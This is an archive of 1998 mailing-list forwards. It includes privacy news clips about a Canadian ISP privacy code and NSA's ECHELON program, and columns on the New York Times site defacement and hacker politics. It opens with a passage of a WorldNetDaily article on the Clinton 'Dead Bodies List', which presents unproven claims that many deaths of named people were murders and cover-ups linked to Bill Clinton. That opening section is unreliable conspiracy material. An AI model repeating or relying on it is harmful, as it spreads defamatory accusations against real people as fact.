                    Commerce Secretary Ron Brown's death was
                    that his plane was brought down by, "the
                    worst storm in a decade." However, the
                    Dubrovnik airport weather office, just
                    two miles from the crash site, could not
                    confirm the existence of any such storm,
                    nor did any other pilots in the area.
                    According to the April 8, 1996, Aviation
                    Week & Space Technology, three separate
                    radio links to the aircraft all quit
                    while the aircraft was still seven miles
                    from the crash, evidence that the plane
                    suffered a total electrical failure in
                    flight which was never investigated. The
                    perfectly cylindrical hole in Ron Brown's
                    skull never triggered an autopsy. After
                    Ron Brown's death, his co-worker, Barbara
                    Wise, was found locked in her office at
                    the Department of Commerce, dead,
                    bruised, and partially nude. Following
                    Brown's death, John Huang's new boss at
                    Commerce was Charles Meissner, who
                    shortly thereafter died in yet another
                    plane crash.
 
                    These and other questionable deaths have
                    been collected together in a document
                    known as the "Dead Bodies List," which
                    can now be found in many locations on the
                    World Wide Web. Some of the cases are
                    poorly documented and have been dismissed
                    until now as "conspiracy theory."
                    However, analysis of the "Dead Bodies
                    List" by experts on the Internet revealed
                    that in many cases, deaths whose
                    circumstances demanded an investigation
                    had been ignored.
 
                    Some events officially declared to be
                    accidents seem to stretch the bounds of
                    credulity. In one case, Stanley Heard,
                    member of a Clinton advisory committee
                    and chiropractor to Clinton family
                    members, and his lawyer Steve Dickson
                    were flying to a meeting with a reporter.
                    Heard's private plane caught fire, but he
                    was able to make it back to his airport
                    and rent another plane to continue his
                    journey. The rented plane then caught
                    fire. This time, Heard did not make it
                    back to the airport. Gandy Baugh,
                    attorney for Clinton friend and convicted
                    cocaine distributor Dan Lasater, fell out
                    of a building. Baugh's law partner was
                    dead just one month later. Jon Parnell
                    Walker, an RTC investigator looking into
                    Whitewater, interrupted his inspection of
                    his new apartment to throw himself off of
                    the balcony.
 
                    Nor does the pattern of suspicious deaths
                    discriminate by gender. Susan Coleman was
                    reportedly a mistress to Clinton while he
                    was Arkansas attorney general; she was
                    seven months pregnant with what she
                    claimed was Clinton's child when she
                    died. Judy Gibbs, a former Penthouse Pet
                    and call girl, reportedly counted Bill
                    Clinton among her clients. Shortly after
                    agreeing to help police in an
                    investigation into Arkansas cocaine
                    trafficking, Judy burned to death. Kathy
                    Ferguson, a witness in the Paula Jones
                    case, was killed with a gunshot behind
                    the ear and was declared a suicide, even
                    though her suitcases had all been packed
                    for an immediate trip. One month later,
                    Bill Shelton, Kathy's boyfriend and a
                    police officer who had vowed to get to
                    the bottom of Kathy's murder, was also
                    dead of a gunshot, his body dumped on
                    Kathy's grave.
 
                    Another alarming trend observed in these
                    deaths is how society's safeguards
                    against murder appear to have been
                    compromised. Many of the questionable
                    deaths involved either negligence or the
                    complicity of medical examiners.
 
                    Dr. Fahmy Malek was the Arkansas medical
                    examiner under then-Gov. Bill Clinton.
                    His most famous case involved his ruling
                    in the "Train Deaths" case of Don Henry
                    and Kevin Ives in which Dr. Malek ruled
                    that the two boys had fallen asleep on
                    the railroad tracks and been run over by
                    a train. A subsequent autopsy by another
                    examiner found signs of foul play on both
                    the boys' bodies and concluded that they
                    had been murdered. According to Jean
                    Duffey, the prosecutor in the Saline
                    County Drug Task Force, the two boys
                    accidentally stumbled onto a "protected"
                    drug drop and were killed for it. Dan
                    Harmon, the Arkansas investigator who
                    concluded there was no murder, is now in
                    prison on drug charges. Despite the
                    evidence for murder and national
                    exposure, the Henry/Ives case has never
                    officially been re-opened, and Jean Duffy
                    has since left Arkansas out of fear for
                    her life. Several witnesses in the
                    Henry/Ives case later died and were ruled
                    as either suicides or natural causes by
                    Dr. Malek, whose willingness to provide
                    an innocuous explanation for these deaths
                    is illustrated in one case where he
                    claimed that a headless victim had died
                    of natural causes. Malek claimed that the
                    victim's small dog had eaten the head,
                    which was later recovered from a trash
                    bin. When pressed to fire Dr. Malek, Gov.
                    Clinton excused the medical examiner's
                    performance as the result of overwork and
                    gave him a raise.
 
                    Dr. Malek's Washington D.C. counterpart
                    was Fairfax, Virginia, Medical Examiner
                    James C. Beyer. Long before his autopsy
                    on Vincent Foster, Beyer's work was
                    disputed. In the case of Tim Easely,
                    Beyer ignored obvious defensive wounds,
                    and eyewitness reports of an argument
                    between Easely and his girlfriend, to
                    conclude that Easely had committed
                    suicide by stabbing himself in the chest.
                    When an outside expert called attention
                    to the fact that Easely had been stabbed
                    clear through one of his palms, the
                    girlfriend confessed to the murder. In
                    the case of Tommy Burkett, Beyer ignored
                    signs of violence done to Burkett to rule
                    it was a simple suicide. A subsequent
                    autopsy showed that Beyer had not even
                    done the work he claimed in his original
                    autopsy. Even though Beyer showed X-rays
                    to Burkett's father, Beyer later claimed
                    they did not exist. When Beyer performed
                    the Foster autopsy, he wrote in his
                    report that X-rays had been taken, then
                    again claimed they never existed when
                    asked to produce them.
 
                    In some cases, the deaths simply have no
                    innocuous explanation, One witness, Jeff
                    Rhodes (who had information on the
                    Henry/Ives murders) was found with his
                    hands and feet partly sawn off, shot in
                    the head, then burned and thrown in a
                    trash bin. Another obvious murder was
                    Jerry Parks, Clinton's head of security
                    in Little Rock. Immediately following
                    news of Foster's death, Parks reportedly
                    told his family, "Bill Clinton is
                    cleaning house." Just weeks after the
                    Parks' home had been broken into and his
                    files on Clinton stolen, Parks was shot
                    four times in his car.
 
                    Ron Miller, on whose evidence Nora and
                    Gene Lum were convicted of laundering
                    Clinton campaign donations, went from
                    perfect heath to death in just one week
                    in a manner so strange that his doctors
                    ordered special postmortem tests. The
                    results of those tests have never been
                    released, but toxicologists familiar with
                    the case suggest that Miller's symptoms
                    are consistent with Ricin, a cold war
                    assassin's poison.
 
                    For a fortunate few the murder attempts
                    have failed. In the case of Arkansas drug
                    investigator Russell Welch, his doctors
                    were able to identify that he had been
                    infected with military anthrax in time to
                    save his life. Gary Johnson, Gennifer
                    Flowers' neighbor whose video
                    surveillance camera had accidentally
                    caught Bill Clinton entering Flowers'
                    apartment, was left for dead by the men
                    who took the video tape. Gary survived,
                    although he is crippled for life. L.J.
                    Davis, a reporter looking into the
                    Clinton scandals, was attacked in his
                    hotel room but survived (his notes on
                    Clinton were stolen). Dennis Patrick,
                    whose bond trading account at Dan
                    Lasater's company was used to launder
                    millions of dollars of drug money, has
                    had four attempts on his life.
 
                    But the real importance of the "Dead
                    Bodies List" isn't what it tells us of
                    modern political intrigues, but what it
                    tells us of ourselves, in how we respond
                    to it. The list has been around for quite
                    some time, largely ignored by the general
                    public, completely ignored by the
                    mainstream media. The common reaction has
                    been that such a list is unbelievable,
                    not for its contents, but for its
                    implications. For that reason, most
                    Americans have, until recently, accepted
                    at face value the official assurances
                    that all these deaths are isolated
                    incidents with no real meaning; that all
                    the indications of foul play and cover-up
                    are just an accumulation of clerical
                    error and "overwork"; that it's all just
                    "coincidence."
 
                    On Aug. 17, as Bill Clinton admitted his
                    "inappropriate relationship" with Monica
                    Lewinsky on nationwide television,
                    Americans began to confront the
                    unavoidable fact that this president and
                    his administration had lied to the public
                    about a rather trivial matter. Americans
                    came to realize that this president and
                    his administration could no longer safely
                    be assumed to have told the truth on more
                    serious matters.
 
                    In this new climate of doubt, the "Dead
                    Bodies List" has enjoyed a new vogue,
                    albeit a dark one. Talk radio discusses
                    it. Total strangers e-mail it to each
                    other. What was unthinkable a few months
                    ago has become all too plausible.
                    Political murder has come to America.
                    Those cases on the "Dead Bodies List"
                    where hard evidence directly contradicts
                    the official conclusion have come under
                    renewed scrutiny.
 
                    It takes courage for the average citizen
                    to accept that the government has lied to
                    them, for by doing so, the citizen also
                    accepts the obligation to do something
                    about it. Americans know beyond a doubt
                    that they have been lied to. Americans
                    are discovering that they cannot ignore
                    the fact of being lied to without
                    sacrificing that part of the American
                    self-image that holds honor and justice
                    as ideals. But as the above poll would
                    suggest, such a sacrifice is no longer
                    acceptable.
 
                 -----------------------------------------------------------
                                  [WorldNetDaily.com]
                   ---------------------------------------------------------
                               (c) 1998 Western Journalism Center
                   ---------------------------------------------------------
                     This page was last built 9/24/98; 11:51:28 
                              Site: matlanta@mindspring.com
 
 *** A List of Strange Deaths of Individuals Who All Had Verifiable 
     Ties with Bill Clinton
 http://www.devvy.com/death_list.html
 
 VINCE FOSTER FIVE YEARS AFTER
 Unsolved Mystery Hampers All Starr's Probes By Carl Limbacher
 http://www.esotericworldnews.com/vince.htm
 
 VINCE FOSTER INVESTIGATIONCHRIS RUDDY, (PITTSBURGH TRIBUNE) 
 http://www.ruddynews.com
 Christopher Ruddy's New Web Site <NewsMax.com>
 http://www.newsmax.com/insidecover.shtml
 Vince Foster - Patrick Knowlton v. FBI Agent Bransford
 http://www.monumental.com/lawofcjc/pk/
 *** Foster "J'Accuse!"
 http://www.angelfire.com/fl/pjcomix/zola1.html
 
 EENIE MENA MINIE MOE...
 http://www.esotericworldnews.com/eenie.htm
 
 The Mena Coverup
 http://www.esotericworldnews.com/mena.htm
 
 THE "SECRET" CHEMICAL FACTORY THAT NO ONE TRIED TO HIDE
 http://www.esotericworldnews.com/london.htm
 
 
 American Patriot Friends Network (APFN)
 APFN EMAIL LIST SUBSCRIBE/UNSCBSCRIBE IN SUBJECT LINE TO APFN@netbox.com
 APFN ONELIST: http://www.onelist/subscribe.cgi/apfn
 http://w20.hitbox.com/wc/index.cgi?W50887524
 http://esotericworldnews.com/apfncont.htm
 http://www.freeyellow.com/members5/apfn/
 
 
 ----------------------- Headers --------------------------------
 Return-Path: <pamrobin@caliente.igate.com>
 Received: from  rly-za04.mx.aol.com (rly-za04.mail.aol.com [172.31.36.100])
by air-za04.mail.aol.com (v50.11) with SMTP; Thu, 24 Sep 1998 22:49:20 -0400
 Received: from heather.greatbasin.com (heather.greatbasin.net
[207.228.35.41])
 	  by rly-za04.mx.aol.com (8.8.8/8.8.5/AOL-4.0.0)
 	  with ESMTP id WAA15772;
 	  Thu, 24 Sep 1998 22:46:20 -0400 (EDT)
 Received: from caliente.igate.com ([207.228.53.226])
 	by heather.greatbasin.com (8.9.0/8.8.8) with ESMTP id SAA08413;
 	Thu, 24 Sep 1998 18:38:04 -0700 (PDT)
 Message-ID: <360AF264.C0288E60@caliente.igate.com>
 Date: Thu, 24 Sep 1998 18:31:16 -0700
 From: American Patriot Friends Network <pamrobin@caliente.igate.com>
 Reply-To: APFN@netbox.com
 Organization: American Patriot Friends Network
 X-Mailer: Mozilla 4.05 [en] (Win95; I)
 MIME-Version: 1.0
 To: "\"apfn@onelist.com\"" <apfn@onelist.com>
 Subject: The Clinton 'body count' - New alarm..
 Content-Type: text/plain; charset=iso-8859-1
 Content-Transfer-Encoding: 8bit
 
  >>


- - ------------------------------------------------------------------------
To unsubscribe from this mailing list, or to change your subscription
to digest, go to the ONElist web site, at http://www.onelist.com and
select the User Center link from the menu bar on the left.



- - --------------0F193EECF4CB9441348B1B97--


- ------- End of Forwarded Message


------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 25 Sep 1998 23:34:24 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 4.70:Canadian Internet Providers Draft Privacy Code
Message-ID: <199809260435.VAA11796@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 4.70:Canadian Internet Providers Draft Privacy Code
Date: Fri, 25 Sep 1998 01:11:35 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 4.70:Canadian Internet Providers Draft Privacy Code
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Friday September 25, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: The Canadian Press (CP), September 17, 1998
http://www.cp.org

Net Privacy Code Drafted

OTTAWA (CP) -- Internet providers have released their own draft privacy
code just as the government prepares to introduce legislation this fall on
the matter.

The Canadian Association of Internet Providers, which represents more than
120 providers, hopes industry efforts to regulate itself will stave off
government action it says could lead to onerous and potentially harmful
national regulations enshrined in law.

"If it's extremely onerous for an international company to do business in
Canada, they will not do business in Canada," Julie Garcia, senior counsel
at America Online Inc. who helped develop the draft code, said.

The code, intended to be voluntary, addresses concerns such as control and
disclosure of users' personal information.

It was drafted to ensure it complies with the Canadian Standards
Association Model Code for the Protection of Personal Information.

The Internet providers code sets out 10 privacy principles for the
industry, including:

*      Internet providers are responsible for personal information
under their control.

*      Providers must disclose reasons for collecting personal
information.

*      Consent of users is mandatory for collection, use or disclosure
of information.

*      Personal information can be disclosed without consent only as
required by law.

"The majority of CAIP members already have some kind of a privacy
policy," said Margo Langford, chairwoman of the Internet association.

"What we're really trying for here is uniformity. I don't think you'll
find anybody that objects to the notion. Privacy is good for business."

The Internet providers association says U.S. experience has shown that
voluntary regulation works better than government law because it fosters
competition among providers to meet user demands.

Surveys have shown consumers are wary about using the Internet because
of concerns about the privacy of their personal information.

The federal government wants to introduce legislation early this fall to
protect Internet privacy, especially for electronic commerce purposes,
before
Canada is host of an Organization for Economic Co-operation and
Development conference in October.

Ottawa established a group to study electronic commerce and it produced a
paper on privacy that recommends legislation to address the very issues
the Internet association's draft code covers.

In addition, the Canadian Radio-television and Telecommunications
Commission announced in July it would hold public hearings in November
on whether it should get involved in regulating new media, including the
Internet.

Story Copyright (c) 1998 The Canadian Press (CP)

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.









**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 25 Sep 1998 23:33:42 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 4.73: Europeans Bristle Over NSA's ECHELON-So Should You
Message-ID: <199809260435.VAA11807@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 4.73: Europeans Bristle Over NSA's ECHELON-So Should You
Date: Fri, 25 Sep 1998 01:12:58 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 4.73: Europeans Bristle Over NSA's ECHELON-So Should You
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Friday September 24, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: The Baltimore Sun, September 19, 1998
http://www.sunspot.net

NSA listening practices called European `threat'
European Parliament report accuses agency of widespread spying
http://www.sunspot.net/cgi-bin/editorial/story.cgi?storyid=900000194001

By
Neal Thompson
Sun Staff

The National Security Agency has incurred the wrath of some U.S. allies and
triggered debate about increased global eavesdropping, thanks to a new
report that accuses the agency of spying on European citizens and
companies.

With the help of a listening post in the moors of northern England, NSA for
nearly a decade has been snatching Europe's electronic communications
signals, according to a report for the European Parliament.

"Within Europe, all e-mail, telephone and fax communications are routinely
intercepted by the United States National Security Agency, transferring all
target information to Fort Meade," said the report.

`Powerful threat'

It warned that the NSA's tactics represent a "powerful threat to civil
liberties in Europe" at a time when more communication -- and commerce --
is conducted electronically.

A preliminary version of the report circulated overseas in recent months,
touching off heated debate, with front-page stories in Italy, France,
Scotland, England, Belgium and even Russia.

The NSA won't discuss the report or even admit that the listening post
exists.

But this week, two days of debate in the European Parliament continued the
extraordinary public disclosure of comprehensive post-Cold War spying by
the agency. On Wednesday, the Parliament passed a resolution seeking more
accountability from such eavesdropping arrangements and more assurances
that they won't be misused.

"We want to make sure that somebody's watching them," said Glyn Ford, a
British member of the European Parliament, the legislative body for the
15-member European Union.

Observers say this was the first time a governmental body has described in
detail -- and then criticized -- the NSA's tactics.

"The cat's well and true out of the bag," said Simon Davies, director of
the London-based watchdog group Privacy International. "I would argue that
we have made the grandest step in 50 years toward accountability of such
national security transparencies."

The report describes a sophisticated program called Echelon, which the NSA
established in conjunction with British intelligence agencies. The program
includes a listening post in Menwith Hill, in Yorkshire, whose satellite
dishes soak up the satellite and microwave transmissions carrying Europe's
telephone conversations, faxes and e-mail.

Unlike Cold War spying aimed at the military, Echelon is a global
electronic surveillance system that targets individuals, businesses,
governments and organizations, the report says.

The U.S. shares the information with Britain, Canada, Australia and New
Zealand as part of an intelligence-sharing agreement called UKUSA. Each
nation has its own set of key words, so it can seek information on specific
issues, the report states.

Europe is but a fraction of Echelon's target area -- and the Menwith Hill
post is one of at least 10 around the world, the report adds.

"One reason its a bigger deal over there than it is over here [in the U.S.]
is because the SIGINT [signals intelligence] systems are over their heads
and not our heads," said Jeffrey Richelson, an analyst with the National
Security Archives, a U.S. group seeking to declassify intelligence related
documents.

Echelon repercussions

But the disclosure of Echelon could soon resonate across the Atlantic after
the European Parliament action. Furthermore, it could complicate current
negotiations between the U.S. and the European Union over encryption
programs that scramble or encode computer information, said Parliament
member Ford.

The U.S. has been lobbying for back-door access to such codes for security
reasons.


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.











**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 25 Sep 1998 23:33:48 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Analysis of a Hack: Why was NYT Different?
Message-ID: <199809260435.VAA11818@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Analysis of a Hack: Why was NYT Different?
Date: Fri, 25 Sep 1998 04:09:43 -0500
To: believer@telepath.com

Source:  Online Journalism Review
http://olj.usc.edu/indexf.htm?/sections/

September 17, 1998

Analysis of a Hack
By Doug Thomas, Online Journalism Review Staff Columnist 
 
The following report is based in part on interviews conducted with Kevin
Mitnick and John Markoff, two key people whose names were invoked as part
of the September 13, 1998 hack of The New York Times Web site. 
 
On Sunday, September 13, a group calling themselves "Hackers for Girlies"
hacked into The New York Times Web site, forcing the Times to take its site
offline for nine hours - hours that happened to be on what was potentially
one of the paper's biggest days in the paper's online history. According to
the Times, traffic that was already up 35% on Saturday was expected to
double on Sunday, in large part due to The New York Times' coverage of the
Starr Report and the report's full text, which was also on the site. 
 
The hack, which was by all accounts a fairly sophisticated attack, is
different from most previous hacks in a number of ways. There have
previously been hacks of Web pages designed to express political
dissatisfaction. The Department of Justice Web page, for example, was
hacked in response to the passage
of the Communications Decency Act. Sites of both the Conservative and Labor
parties in Britain were hacked prior to elections. But this is the first
hacking incident - which could also be considered a political intervention
- where a major media outlet has been financially damaged over the public
perception that their coverage was unfair. 
 
At the heart of the dispute is the case of Kevin Mitnick, and at issue for
hackers is the question of Times technology reporter John Markoff's
coverage of Mitnick's case. Mitnick, who has served the last three and a
half years as a pre-trial detainee at the federal Metropolitan Detention
Center in Los Angeles, was the subject of several Times stories written by
Markoff. He was ultimately the subject of a best-selling novel co-authored
by Markoff and Tsutomu Shimomura, the San Diego-based security expert who
helped the FBI track and capture Mitnick. 
 
Hackers allege that Markoff used his position at the Times to hype the
story of Mitnick's arrest and capture - and to demonize Mitnick in the
public imagination. These perceptions, according to the hacker community,
account in large part for Mitnick's continued incarceration in a
maximum-security jail and his denial of the right to a bail hearing. He is
only four months from trial on a 25-count federal indictment for alleged
hacking. 

 In short, the message that hackers left on the Times Web site could be
boiled down to this: They feel that the way hackers are covered by the
mainstream media generally, and by The New York Times specifically, is
unfair. They are disturbed both by what is written about hackers, as well
as what stories are overlooked. 

 The battle over such representations continues to be played out in the
coverage of the hack itself. Mitnick learned of the Times hack through
local radio broadcast reports, some of which described it as an "act of
Internet terrorism" led by Mitnick. But Mitnick said in an interview that
he was upset both by the incident and the subsequent coverage of it. 
 
The message that the hackers left Sunday came in two parts: the page that
was displayed on the Times' Web site and the comments left in the HTML
code, which were far more articulate than the hacker-speak that
appeared on the surface. The hackers themselves indicate this in their P.S.
"0UR C0MMENTS ARE M0RE 'LEET THAN 0UR TEXT. DOWNLOAD THE SOURCE T0 TH1S
PAGE AND P0NDER 0UR W1ZD0M." It is in the comments embedded in the source
code that the hackers describe "the real meaning" of the page, including
supporting quotations from Tennyson, Voltaire and Milton. 
 
The hackers' central grievance stems from what they see as Markoff's
involvement in the pursuit and capture of Mitnick. The Web page's message
targets Markoff, specifically asking: "D0 YOU HAV3 N1GHTMAR3S ABOUT H3LP1NG
1MPRIS0N K3VIN? KN0WING THAT Y0UR LI3S AND D3C3IT H3LP3D BR1NG D0WN TH1S
INJUST1C3?" 
 
What lies beneath the code in the comments spells out the hackers'
complaint more directly: "The injustice Markoff has committed is criminal.
He belongs in a jail rotting instead of Kevin Mitnick. Kevin is no dark
side hacker. He is not malicious. He is not a demon. He did not abuse
credit cards, distribute the software he found or deny service to a single
machine. Is that so hard to comprehend?" 
 
Markoff, in an interview Tuesday, said his coverage of Mitnick's case was
totally objective. After years of covering Mitnick and because of his close
connections with Shimomura, Markoff said he found himself with
"access to remarkable events" and wrote about them "as accurately and
clearly as I could." 
 
"There were no dilemmas," he said. "I told my Times editors what I was
doing every step of the way." 
 
Regarding the decision to make a Page One story of the FBI pursuit of
Mitnick, he said: "I didn't place the
story." 
 
"If hackers are upset and believe the story was hyped, they are targeting
the wrong person," Markoff said. "Their quarrel is with the Times' editors,
not me." 
 
Although the term given to Mitnick - "darkside hacker" - did figure
prominently in Markoff's book, "Cyberpunk," which he co-authored with Katie
Hafner, Markoff said that the "darkside" moniker was "created by the
Southern California press." He said the term appeared in stories by both
the Los Angeles Times and the Daily News in the San Fernando Valley well
before he ever used it. 
 
Markoff thinks the hack against the Times has the potential to do
"tremendous damage" to Mitnick. If Mitnick's defenders want to make the
claim that Mitnick and people like him are "harmlessly wandering through
cyberspace," Markoff said, an event like this is the "clearest example to
contradict that." 
 
Emmanuel Goldstein, editor of the hacker publication 2600, sees things
differently. "It's not what I would have done," Goldstein said. "But it got
the story out. It is a story that has been suppressed for so long." 
 
The popular sentiment among hackers is that the coverage of the Mitnick
case hyped his arrest and capture - by referring to him as the "Internet's
Most Wanted," as a "cyberthief" and in some cases as a "terrorist" - but
the press has paid little or no attention to issues of Mitnick's long
incarceration without a hearing, the denial of his right to a bail hearing,
or to the fact that the government has failed to provide Mitnick with
access to the evidence to be presented against him. 
 
Even Markoff, who insists that he played no part in putting Mitnick in
jail, indicated that he has "a lot of sympathy for Kevin," acknowledging
that Mitnick is in a "difficult situation" and is faced with a "grim set of
alternatives." But Markoff rejects the notion that anyone but Mitnick
himself is responsible for his current situation. "Kevin made himself what
he is," Markoff said. 

 A statement from Mitnick's attorney,  released on Monday, addressed the
hack of the Times: "Kevin Mitnick
 appreciates the support and good wishes of those who speak out against his
continued state of incarceration for years without bail. However, he does
not encourage any individuals to engage in hacking pranks on his behalf.
Kevin believes other avenues exist that can be more beneficial to his
circumstances." Supporters were directed to the Mitnick Web site at
www.kevinmitnick.com. 

 In the aftermath of the hack, several issues remain. The New York Times
will undoubtedly claim that the damage done to their site has cost them
substantial lost revenue and a decrease in traffic and e-commerce.
Goldstein, however, quarrels with the claim that any real damage was done.
"They didn't trash the Times' Web site and they could have," he said,
indicating that the hack was intended to send a message, rather than to do
any serious damage. 
 
This is not the first time a Web site has been hacked in support of
Mitnick. In fact, in December of 1997, hackers posted a threatening message
at Yahoo!, demanding the release of Mitnick. While that incident can be
dismissed as a prank, the Times attack is something altogether different.
Even the message the hackers left on the Times' page criticizes other
hackers for not having "a real purpose" and for not leaving a "meaningful
statement" in their hacks. 

(c) Copyright 1998 Online Journalism Review
 
Doug Thomas is a professor at the Annenberg School for Communication. His
column, Hacker Alert, appears monthly in the Online Journalism Review. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 25 Sep 1998 23:33:54 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Why is This Important? Read: The Politics of Hacking
Message-ID: <199809260435.VAA11835@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Why is This Important? Read: The Politics of Hacking
Date: Fri, 25 Sep 1998 04:19:59 -0500
To: believer@telepath.com

----------------------------
NOTE:  Here is why the issue is important:  "Mitnick has been incarcerated
for three and a half years without a hearing and has had the evidence to be
brought against him withheld from discovery."  No habeas corpus.  No
hearing.  No evidence.  This man is a political prisoner to whom justice
has been denied.  Is he guilty?  No one will ever know if there is never a
trial.  Presumption of innocence is obviously a thing of the past.  
----------------------------

Source:  Online Journalism Review
http://olj.usc.edu/indexf.htm?/sections/

September 16, 1998

The Politics of Hacking
By Doug Thomas, Online Journalism Review Staff Columnist 
 
Over the past few years there has been a decided shift in the way hackers
think about the world. Born from an idealistic model of personal,
individual achievement, the very idea of hacking has always been a singular
and isolated phenomenon. In the early days, hackers rarely worked in groups
or teams, preferring to hand programming solutions off to one another in
the process of what they called "bumming code." Each time a
program was handed off, it would be improved slightly and then passed along
to the next hacker, and so on. 
 
Hackers of the 1980s and 1990s, who began to form loosely knit groups such
as the Legion of Doom and Masters of Deception, practiced a similar ethic,
whereby hackers would learn from one another, but generally the
understanding was everyone for themselves (especially whenever someone got
arrested!). 
 
That ethic, which began with the hackers of the 1960s and 1970s, is
beginning to dissolve in the face of politics. 
 
Old school hackers are oftentimes disgusted by the antics of their progeny
(and make no mistake they are their offspring). Indeed, many old-timers
insist that today's hackers are unworthy of the moniker "hacker" and prefer
to terminologically reduce them, calling them "crackers" instead. That
distinction has never held much truck with me. It denies too much history,
too many connections, and is often nothing more than a nostalgic, and very
convenient, recollection of their own histories. 
 
The earliest hackers did most of what they criticize today's hackers for.
Let's face it, they stole (the Homebrew Computer Club was famous for
pirating code), they regularly engaged in telephone fraud (even Jobs and
Wozniak built and sold blue boxes), they used all sorts of hacks to avoid
